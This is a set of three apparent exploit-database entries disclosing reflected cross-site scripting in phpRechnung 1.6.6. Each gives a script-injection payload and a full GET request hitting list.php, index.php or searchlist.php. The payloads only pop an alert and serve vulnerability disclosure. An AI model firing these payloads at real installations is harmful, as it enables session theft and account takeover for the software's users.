===========================================================================================
# Exploit Title: phpRechnung 1.6.6 - 'list.php' XSS Injection
# CVE: N/A
# Date: 03-03-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://sourceforge.net/projects/phprechnung/
# Software Link: https://sourceforge.net/projects/phprechnung/
# Version: v1.6.6
# Category: Webapps
# Tested on: Wamp64, @Win
# Software description: phpRechnung is easy-to-use Web-based multilingual accounting software.
===========================================================================================
# POC - XSS
# Parameters : addresbook,cashbook,invoice,offer,payment,position,syslog,user
# Attack Pattern : /'"--></style></scRipt><scRipt>alert(0x0005CD)</scRipt>
# GET Request : http://localhost/phpRechnung/addressbook/list.php/'"--></style></scRipt><scRipt>alert(0x0005CD)</scRipt>
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: phpRechnung 1.6.6 - 'index.php' XSS Injection
# CVE: N/A
# Date: 03-03-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://sourceforge.net/projects/phprechnung/
# Software Link: https://sourceforge.net/projects/phprechnung/
# Version: v1.6.6
# Category: Webapps
# Tested on: Wamp64, @Win
# Software description: phpRechnung is easy-to-use Web-based multilingual accounting software.
===========================================================================================
# POC - XSS
# Parameters : reports
# Attack Pattern : /'"--></style></scRipt><scRipt>alert(0x000E9B)</scRipt>
# GET Request : http://localhost/phpRechnung/reports/index.php/'"--></style></scRipt><scRipt>alert(0x000E9B)</scRipt>
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: phpRechnung 1.6.6 - 'searchlist.php' XSS Injection
# CVE: N/A
# Date: 03-03-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://sourceforge.net/projects/phprechnung/
# Software Link: https://sourceforge.net/projects/phprechnung/
# Version: v1.6.6
# Category: Webapps
# Tested on: Wamp64, @Win
# Software description: phpRechnung is easy-to-use Web-based multilingual accounting software.
===========================================================================================
# POC - XSS
# Parameters : user
# Attack Pattern : /'"--></style></scRipt><scRipt>alert(0x002883)</scRipt>
# GET Request : http://localhost/phpRechnung/user/searchlist.php/'"--></style></scRipt><scRipt>alert(0x002883)</scRipt>
===========================================================================================
